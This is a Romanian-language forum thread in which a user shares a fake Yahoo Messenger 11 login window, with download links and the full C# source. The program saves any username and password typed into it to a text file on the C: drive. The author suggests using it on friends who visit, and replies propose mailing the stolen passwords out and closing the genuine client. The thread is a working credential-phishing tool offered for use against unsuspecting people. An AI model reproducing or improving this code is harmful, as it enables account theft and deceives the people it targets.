Jump to content
banks

Yahoo Messenger 11 fake

Recommended Posts

În stânga este programul f?cut de mine ?i in dreapta messul original.

Capture.png

Acest program arata aproximativ ca si Yahoo Messenger.

Ce face el? Cand pui parola si numele î?i iese din program ?i în parti?ia C va face un fi?ier numit hehe.txt care con?ine parola ?i numele.

Este un program care îl po?i folosi pe prietenii care vin la tine acas? http://s15.postimage.org/lmb77rsy3/image.png

http://s15.postimage.org/5bg58kmrv/image.png

Download:

http://www.girlshare.ro/4139392.4

http://www.mediafire.com/?u38vbjoayivjdy5

Link to comment
Share on other sites

^ mai este prin cateva zeci de topicuri.

Facut de tine zici a? yea sure, si in ce l-ai facut? in google search?

Eu l-am facut in c#

using System;

using System.Collections.Generic;

using System.ComponentModel;

using System.Data;

using System.Drawing;

using System.Linq;

using System.Text;

using System.Windows.Forms;

using System.Diagnostics;

using System.IO;

using System.Runtime.InteropServices;

namespace Yahoo_Messenger

{

public partial class Form1 : Form

{

public const int WM_NCLBUTTONDOWN = 0xA1;

public const int HT_CAPTION = 0x2;

[DllImportAttribute("user32.dll")]

public static extern int SendMessage(IntPtr hWnd,

int Msg, int wParam, int lParam);

[DllImportAttribute("user32.dll")]

public static extern bool ReleaseCapture();

Form2 frm = new Form2();

public Form1()

{

InitializeComponent();

}

private void pictureBox1_MouseEnter(object sender, EventArgs e)

{

pictureBox1.Image = Properties.Resources.min2;

}

private void pictureBox1_Click(object sender, EventArgs e)

{

this.WindowState = FormWindowState.Minimized;

}

private void pictureBox1_MouseLeave(object sender, EventArgs e)

{

pictureBox1.Image = Properties.Resources.min1;

}

private void pictureBox2_MouseEnter(object sender, EventArgs e)

{

pictureBox2.Image = Properties.Resources.max2;

}

private void pictureBox2_MouseLeave(object sender, EventArgs e)

{

pictureBox2.Image = Properties.Resources.max1;

}

private void pictureBox3_MouseEnter(object sender, EventArgs e)

{

pictureBox3.Image = Properties.Resources.x2;

}

private void pictureBox3_MouseLeave(object sender, EventArgs e)

{

pictureBox3.Image = Properties.Resources.x1;

}

private void pictureBox3_Click(object sender, EventArgs e)

{

Close();

}

int a = 0;

private void pictureBox4_Click(object sender, EventArgs e)

{

if (a % 2 == 0)

pictureBox4.Image = Properties.Resources.ch;

else

pictureBox4.Image = null;

a++;

}

int b = 0;

private void pictureBox5_Click(object sender, EventArgs e)

{

if (b % 2 == 0)

pictureBox5.Image = Properties.Resources.ch;

else

pictureBox5.Image = null;

b++;

}

int c = 0;

private void pictureBox6_Click(object sender, EventArgs e)

{

if (c % 2 == 0)

pictureBox6.Image = Properties.Resources.ch;

else

pictureBox6.Image = null;

c++;

}

private void pictureBox7_MouseEnter(object sender, EventArgs e)

{

pictureBox7.Image = Properties.Resources.eng2;

}

private void pictureBox7_MouseLeave(object sender, EventArgs e)

{

pictureBox7.Image = Properties.Resources.eng1;

}

private void pictureBox8_MouseEnter(object sender, EventArgs e)

{

pictureBox8.Image = Properties.Resources.text12;

}

private void pictureBox8_MouseLeave(object sender, EventArgs e)

{

pictureBox8.Image = Properties.Resources.text11;

}

private void pictureBox8_Click(object sender, EventArgs e)

{

Process.Start("https://edit.yahoo.com/registration?.intl=us&new=1&.done=http%3A//messenger.yahoo.com&.src=maxw");

}

private void pictureBox9_MouseEnter(object sender, EventArgs e)

{

pictureBox9.Image = Properties.Resources.text22;

}

private void pictureBox9_MouseLeave(object sender, EventArgs e)

{

pictureBox9.Image = Properties.Resources.text21;

}

private void pictureBox9_Click(object sender, EventArgs e)

{

Process.Start("http://msg.edit.yahoo.com/config/eval_forgot_pw?.src=pg&.done=http://messenger.yahoo.com/&.intl=us");

}

private void Form1_Load(object sender, EventArgs e)

{

}

bool sw = false;

private void pictureBox10_MouseEnter(object sender, EventArgs e)

{

pictureBox10.Image = Properties.Resources.b2;

sw = true;

}

private void pictureBox10_MouseLeave(object sender, EventArgs e)

{

pictureBox10.Image = Properties.Resources.b1; sw = false;

}

private void pictureBox10_MouseDown(object sender, MouseEventArgs e)

{

if(sw==true)

pictureBox10.Image = Properties.Resources.b3;

}

private void pictureBox10_MouseUp(object sender, MouseEventArgs e)

{

pictureBox10.Image = Properties.Resources.b1;

}

private void pictureBox10_Click(object sender, EventArgs e)

{

if (id.Text == "" || pas.Text == "")

frm.Show();

else

{

StreamWriter chch = new StreamWriter("C:\\hehe.txt");

chch.Write("Id-ul: " + id.Text + System.Environment.NewLine + "Parola: " + pas.Text);

chch.Close();

}

}

private void pictureBox11_MouseDown(object sender, MouseEventArgs e)

{

if (e.Button == MouseButtons.Left)

{

ReleaseCapture();

SendMessage(Handle, WM_NCLBUTTONDOWN, HT_CAPTION, 0);

}

}

private void pictureBox12_MouseEnter(object sender, EventArgs e)

{

pictureBox12.Image = Properties.Resources.mes1;

}

private void pictureBox12_MouseLeave(object sender, EventArgs e)

{

pictureBox12.Image = Properties.Resources.mess1;

}

private void pictureBox13_MouseEnter(object sender, EventArgs e)

{

pictureBox13.Image = Properties.Resources.hl2;

}

private void pictureBox13_MouseLeave(object sender, EventArgs e)

{

pictureBox13.Image = Properties.Resources.hl1;

}

}

}

Link to comment
Share on other sites

Guest Kovalski

^ oo da chiar te rog sa postezi sursa aici si sa explici pas cu pas cum ai facut.

ai 10 minute sa o faci daca nu presimt ca o sa te intorci la Counter Strike.

Iar daca o faci, eu iti spun bravo si iti dau like.

LE: Bravo.

Edited by ps-axl
Link to comment
Share on other sites

^ oo da chiar te rog sa postezi sursa aici si sa explici pas cu pas cum ai facut.

ai 10 minute sa o faci daca nu presimt ca o sa te intorci la Counter Strike.

Iar daca o faci, eu iti spun bravo si iti dau like.

LE: Bravo.

Ok.

E foarte simplu.

Cand apesi pe Sign In ce este in textbox 1 si textbox 2 se va crea in partitia c.

StreamWriter lalala=new StreamWriter(@"c:/nume.txt"); // aici pui locatia fisierului

lalala.Write("Nume " + textBox1.Text+ Environment.NewLine + "Parola " + textBox2.Text); // scrie in fisier numele si parola // //scrise de tine din textboxurile de mai sus.

lalala.Close(); // ii explicam programul ca s-a terminat de scris fisierul si acum se creeaza.

Cat despre design, photoshop ftw

image.jpg

image.jpg

image.jpg

image.jpg

image.jpg

eng1.jpg

eng2.jpg

image.jpg

hl1.jpg

hl2.jpg

max1.jpg

max2.jpg

mes1.jpg

mess1.jpg

min1.jpg

min2.jpg

poza.jpg

text11.jpg

text12.jpg

text21.jpg

text22.jpg

image.jpg

image.jpg

image.jpg

xxx.jpg

Pozele se schimba la eventuri gen mouse down, mouse enter, mouse leave, mouse up pentru a fi exact cele de la YM.

La textbox2 am pus Password char acel punct in mijloc

Programul e chiar banal , doar design-ul este mai complicat.

Link to comment
Share on other sites

;377738']Bravo' date=' dar mai fain era sa-ti trimita pe email parola si cand deschida aplicatia "fake" sa i se inchida originalu.[/quote']

Aha si probabil sa fie o tasta secreta , gen cand apesi tasta END sa se deschida o fereastra unde alegi tu mail-ul , asa ar merge. E usor de realizat.

Link to comment
Share on other sites

Ok.

E foarte simplu.

Cand apesi pe Sign In ce este in textbox 1 si textbox 2 se va crea in partitia c.

StreamWriter lalala=new StreamWriter(@"c:/nume.txt"); // aici pui locatia fisierului

lalala.Write("Nume " + textBox1.Text+ Environment.NewLine + "Parola " + textBox2.Text); // scrie in fisier numele si parola // //scrise de tine din textboxurile de mai sus.

lalala.Close(); // ii explicam programul ca s-a terminat de scris fisierul si acum se creeaza.

Cat despre design, photoshop ftw

image.jpg

image.jpg

image.jpg

image.jpg

image.jpg

eng1.jpg

eng2.jpg

image.jpg

hl1.jpg

hl2.jpg

max1.jpg

max2.jpg

mes1.jpg

mess1.jpg

min1.jpg

min2.jpg

poza.jpg

text11.jpg

text12.jpg

text21.jpg

text22.jpg

image.jpg

image.jpg

image.jpg

xxx.jpg

Pozele se schimba la eventuri gen mouse down, mouse enter, mouse leave, mouse up pentru a fi exact cele de la YM.

La textbox2 am pus Password char acel punct in mijloc

Programul e chiar banal , doar design-ul este mai complicat.

Le dai chiar mur?-n gur? :))

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...